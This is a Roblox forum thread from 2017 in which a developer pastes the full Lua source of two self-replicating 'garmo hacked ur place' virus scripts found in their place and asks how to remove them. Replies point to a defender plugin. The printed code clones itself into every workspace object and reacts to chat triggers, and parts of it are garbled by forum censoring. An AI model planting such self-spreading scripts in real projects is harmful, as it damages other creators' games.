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#224904281Friday, September 08, 2017 3:56 PM GMT

so i wanted to create a game on roblox studio but suddenly i see things with garmo hacked you're place and br######tand there to! it has a script with it and when i try to delete it then 10 seconds later it shows back. Can anyone help me? The Script of Garmo: names={"garmo hacked ur place"} local NameCheck = false script.Parent.Name = names[math.random(1, #names)] script.Name = [[N0ISESCRIPT]] local c = script.Parent:Clone() function addEvent(ch) wait(math.random()) NameCheck = false for ss = 1, #names do if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = ch cloak.Name = names[math.random(1, 5)] end end workspace.ChildAdded:connect(addEvent) game.Players.PlayerAdded:connect(function(pl) pl.Chatted:connect(function(m) if m:sub(1, 5) == "/sc t" then local m = Instance.new("Message") m.Parent = workspace m.Text = "garmo" wait(1) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(0.25) m.Text = "garmo" wait(3) m:remove() end if m:sub(1, 5) == "HAAXX" then local m = Instance.new("Message") m.Parent = workspace m.Text = "HAAXX" wait(3) m:remove() end end) end) while true do local s = workspace:GetChildren() for i = 1, #s do NameCheck = false for ss = 1, #names do if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = s[i] end wait(0.1) end wait(1) end And the script of Br######## n###################local NameCheck = false script.Parent.Name = names[math.random(1, #names)] script.Name = [[ProperGr�mmerNeededInPhilosiphalLocations;insertNoobHere]] local c = script.Parent:Clone() function addEvent(ch) wait(math.random()) NameCheck = false for ss = 1, #names do if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = ch cloak.Name = names[math.random(1, 5)] end end workspace.ChildAdded:connect(addEvent) game.Players.PlayerAdded:connect(function(pl) pl.Chatted:connect(function(m) if m:sub(1, 5) == "/sc t" then local m = Instance.new("Message") m.Parent = workspace m.Text = "THEY CALL ME CRAZY" wait(1) m.########l############# wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GOTTA BE CRAZY" wait(1) m.Text = "lOoOoOoOp" wait(0.25) m.###### #L########### wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GET A LIFE (YOU)" wait(3) m:remove() end if m:sub(1, 5) == "HAAXX" then local m = Instance.new("Message") m.Parent = workspace m.Text = "HAAXX" wait(3) m:remove() end end) end) while true do local s = workspace:GetChildren() for i = 1, #s do NameCheck = false for ss = 1, #names do if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = s[i] end wait(0.1) end wait(1) end
#225578223Sunday, September 24, 2017 9:13 PM GMT

same dude!
#225591619Monday, September 25, 2017 3:23 AM GMT

I've never seen anything like this. use this plugin; https://www.roblox.com/catalog/142273772/Ro-Defender-Plugin-v8-7 jツ

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